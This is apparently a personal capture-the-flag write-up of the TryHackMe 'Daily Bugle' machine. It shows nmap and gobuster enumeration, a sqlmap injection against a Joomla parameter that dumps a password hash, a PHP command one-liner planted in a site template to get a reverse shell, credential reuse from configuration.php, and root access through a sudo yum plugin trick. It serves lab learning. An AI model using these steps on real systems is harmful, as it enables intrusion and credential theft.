Daily bugle - wook413

#sqlmap #tryhackme ![[Pasted image 20250627000258.png]] --- # Port scanning - Nmap Found 3 TCP open ports out of all the ports. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop/vpn] └─$ sudo nmap -sS $IP -Pn -n --open --min-rate 3000 -p- [sudo] password for parallels: Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-26 20:52 CDT Nmap scan report for 10.10.100.56 Host is up (0.13s latency). Not shown: 65532 closed tcp ports (reset) PORT STATE SERVICE 22/tcp open ssh 80/tcp open http 3306/tcp open mysql Nmap done: 1 IP address (1 host up) scanned in 23.32 seconds ``` Let's perform another scan against ports found but this time with scripts ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop/vpn] └─$ nmap -sC -sV $IP -p 22,80,3306 Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-26 20:54 CDT Nmap scan report for 10.10.100.56 Host is up (0.13s latency). PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 7.4 (protocol 2.0) | ssh-hostkey: | 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA) | 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA) |_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (ED25519) 80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40) |_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40 |_http-title: Home |_http-generator: Joomla! - Open Source Content Management | http-robots.txt: 15 disallowed entries | /joomla/administrator/ /administrator/ /bin/ /cache/ | /cli/ /components/ /includes/ /installation/ /language/ |_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/ 3306/tcp open mysql MariaDB 10.3.23 or earlier (unauthorized) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 18.11 seconds ``` # Footprinting ##### Port 80 When you navigate to the given IP address (in my case 10.10.100.56), you see this webpage ![[Pasted image 20250626205834.png]] `/robots.txt` reveals many directories that we could potentially explore and get information from. ![[Pasted image 20250626210118.png]] `/administrator` confirms that the CMS running is Jooma. However, we haven't found any credentials. I have tried default passwords like `admin` but didn't seem to work. ![[Pasted image 20250626210847.png]] I tried every other directories listed on `/robots.txt` but none of them has anything except `/administrator`. I was stuck at `/administrator` page. Then I decided to run `gobuster` against the directory. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ gobuster dir -u http://$IP/administrator -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt =============================================================== Gobuster v3.6 by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart) =============================================================== [+] Url: http://10.10.100.56/administrator [+] Method: GET [+] Threads: 10 [+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt [+] Negative Status codes: 404 [+] User Agent: gobuster/3.6 [+] Timeout: 10s =============================================================== Starting gobuster in directory enumeration mode =============================================================== /help (Status: 301) [Size: 247] [--> http://10.10.100.56/administrator/help/] /templates (Status: 301) [Size: 252] [--> http://10.10.100.56/administrator/templates/] /modules (Status: 301) [Size: 250] [--> http://10.10.100.56/administrator/modules/] /includes (Status: 301) [Size: 251] [--> http://10.10.100.56/administrator/includes/] /language (Status: 301) [Size: 251] [--> http://10.10.100.56/administrator/language/] /components (Status: 301) [Size: 253] [--> http://10.10.100.56/administrator/components/] /cache (Status: 301) [Size: 248] [--> http://10.10.100.56/administrator/cache/] /logs (Status: 301) [Size: 247] [--> http://10.10.100.56/administrator/logs/] ``` in the following path `/administrator/language/en-GB/en-GB.xml`, I found the version of Joomla CMS. ![[Pasted image 20250626212913.png]] Searchsploit reveals a known SQL injection vulnerability in the Joomla version I identified. ![[Pasted image 20250626213548.png]] Looking at the PoC, it explains we can exploit this vulnerability using `sqlmap`. I used the following command: `sqlmap -u "http://10.10.100.56/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent --dbs -p list[fullordering] ` ![[Pasted image 20250626221106.png]] `sqlmap` revealed 5 available databases. ![[Pasted image 20250626220905.png]] Let's first enumerate tables for joomla database. ```bash sqlmap -u "http://10.10.100.56/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomla --tables ``` Found 73 tables and `#__users` table stood out to me. Let's enumerate columns inside the table. ```bash <SNIP> | #__update_sites_extensions | | #__update_sites | | #__updates | | #__user_keys | | #__user_notes | | #__user_profiles | | #__user_usergroup_map | | #__usergroups | | #__users | | #__utf8_conversion | | #__viewlevels ``` ```bash sqlmap -u "http://10.10.100.56/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomla -T '#__users' --columns ``` Found 6 columns! ```bash Database: joomla Table: joomla.#__users [6 columns] +----------+-------------+ | Column | Type | +----------+-------------+ | name | non-numeric | | email | non-numeric | | id | numeric | | params | numeric | | password | non-numeric | | username | non-numeric | +----------+-------------+ ``` We successfully enumerated the name of DB, tables, and columns. Let's dump the data now. ```bash sqlmap -u "http://10.10.100.56/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 --random-agent -p list[fullordering] -D joomla -T '#__users' -C "name,email,id,params,password,username" --dump ``` It returned only 1 entry. - `name`: 'Super User' - `email`: '[email protected]' - `id`: 811 - `param`: '' - `password`: '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm' - `username`: 'jonah' ![[Pasted image 20250626224429.png]] Let's crack Jonah's password. ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ echo '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm' > hash.txt ``` ![[Pasted image 20250626225544.png]] # Exploit Successfully logged into the Joomla server with the credentials found. Now let's explore the website to see if there is any way we could get a reverse shell. ![[Pasted image 20250626230251.png]] Navigate to `Templates`. I selected `Protostar` template. ![[Pasted image 20250626231427.png]] There are several PHP files under the template, Protostar. I plan to edit the `/component.php` file and insert a very short php one liner (`<?php system('uname -a');>?`) to verify if the injection point is accessible and to assess the possibility of achieving a reverse shell. ![[Pasted image 20250626231551.png]] After saving the changes, I access `/templates/protostar/component.php` and successfully received the output of the PHP one liner. ![[Pasted image 20250626232148.png]] Let's modify the one-liner to establish a reverse shell and set up a listener to catch the incoming connection. ![[Pasted image 20250626232626.png]] Got the reverse shell! ```bash ┌──(parallels㉿kali-linux-2024-2)-[~/Desktop] └─$ nc -lvnp 1234 listening on [any] 1234 ... connect to [10.23.133.183] from (UNKNOWN) [10.10.100.56] 49982 sh: no job control in this shell sh-4.2$ whoami whoami apache ``` In the path of `/var/www/html`, this file named `configuration.php` stood out to me because of its name. My hunch was right, I found `$password` variable. ```bash bash-4.2$ cat configuration.php <?php class JConfig { public $offline = '0'; public $offline_message = 'This site is down for maintenance.<br />Please check back again soon.'; public $display_offline_message = '1'; public $offline_image = ''; public $sitename = 'The Daily Bugle'; public $editor = 'tinymce'; public $captcha = '0'; public $list_limit = '20'; public $access = '1'; public $debug = '0'; public $debug_lang = '0'; public $dbtype = 'mysqli'; public $host = 'localhost'; public $user = 'root'; public $password = 'nv5uz9r3ZEDzVjNu'; public $db = 'joomla'; public $dbprefix = 'fb9j5_'; public $live_site = ''; public $secret = 'UAMBRWzHO3oFPmVC'; public $gzip = '0'; public $error_reporting = 'default'; public $helpurl = 'https://help.joomla.org/proxy/index.php?keyref=Help{major}{minor}:{keyref}'; public $ftp_host = '127.0.0.1'; public $ftp_port = '21'; public $ftp_user = ''; public $ftp_pass = ''; public $ftp_root = ''; public $ftp_enable = '0'; public $offset = 'UTC'; public $mailonline = '1'; public $mailer = 'mail'; public $mailfrom = '[email protected]'; public $fromname = 'The Daily Bugle'; public $sendmail = '/usr/sbin/sendmail'; public $smtpauth = '0'; public $smtpuser = ''; public $smtppass = ''; public $smtphost = 'localhost'; public $smtpsecure = 'none'; public $smtpport = '25'; public $caching = '0'; public $cache_handler = 'file'; public $cachetime = '15'; public $cache_platformprefix = '0'; public $MetaDesc = 'New York City tabloid newspaper'; public $MetaKeys = ''; public $MetaTitle = '1'; public $MetaAuthor = '1'; public $MetaVersion = '0'; public $robots = ''; public $sef = '1'; public $sef_rewrite = '0'; public $sef_suffix = '0'; public $unicodeslugs = '0'; public $feed_limit = '10'; public $feed_email = 'none'; public $log_path = '/var/www/html/administrator/logs'; public $tmp_path = '/var/www/html/tmp'; public $lifetime = '15'; public $session_handler = 'database'; public $shared_session = '0'; ``` However, I tried `root:nv5uz9r3ZEDzVjNu` and it did not work. ```bash bash-4.2$ su root Password: su: Authentication failure ``` Then I remembered I found a user named `jjameson` in `/home`. What if I try that same password with username `jjameson`? ```bash bash-4.2$ ls -la total 0 drwxr-xr-x. 3 root root 22 Dec 14 2019 . dr-xr-xr-x. 17 root root 244 Dec 14 2019 .. drwx------. 2 jjameson jjameson 99 Dec 15 2019 jjameson ``` That set of credentials got me successfully logged in! ```bash bash-4.2$ su jjameson Password: [jjameson@dailybugle home]$ whoami jjameson ``` Found `user.txt` ```bash [jjameson@dailybugle ~]$ cat user.txt 27a2... ``` # Privilege Escalation `sudo -l` reveals that we can run `/usr/bin/yum` command with root privilege. ```bash [jjameson@dailybugle ~]$ sudo -l Matching Defaults entries for jjameson on dailybugle: !visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin, env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS", env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE", env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES", env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE", env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY", secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin User jjameson may run the following commands on dailybugle: (ALL) NOPASSWD: /usr/bin/yum ``` As soon as I saw that `sudo -l` returned some commands, I immediately opened my browser and went to `gtfobins.github.io`. As expected, it had guidance on how to exploit the `yum` binary with `sudo`. I followed the exact steps mentioned there. ```bash [jjameson@dailybugle ~]$ TF=$(mktemp -d) [jjameson@dailybugle ~]$ cat >$TF/x<<EOF > [main] > plugins=1 > pluginpath=$TF > pluginconfpath=$TF > EOF [jjameson@dailybugle ~]$ [jjameson@dailybugle ~]$ cat >$TF/y.conf<<EOF > [main] > enabled=1 > EOF [jjameson@dailybugle ~]$ [jjameson@dailybugle ~]$ cat >$TF/y.py<<EOF > import os > import yum > from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE > requires_api_version='2.1' > def init_hook(conduit): > os.execl('/bin/sh','/bin/sh') > EOF [jjameson@dailybugle ~]$ sudo yum -c $TF/x --enableplugin=y Loaded plugins: y No plugin match for: y sh-4.2# whoami root ``` Got `root.txt`! ```bash sh-4.2# cd /root sh-4.2# ls anaconda-ks.cfg root.txt sh-4.2# cat root.txt eec3... ```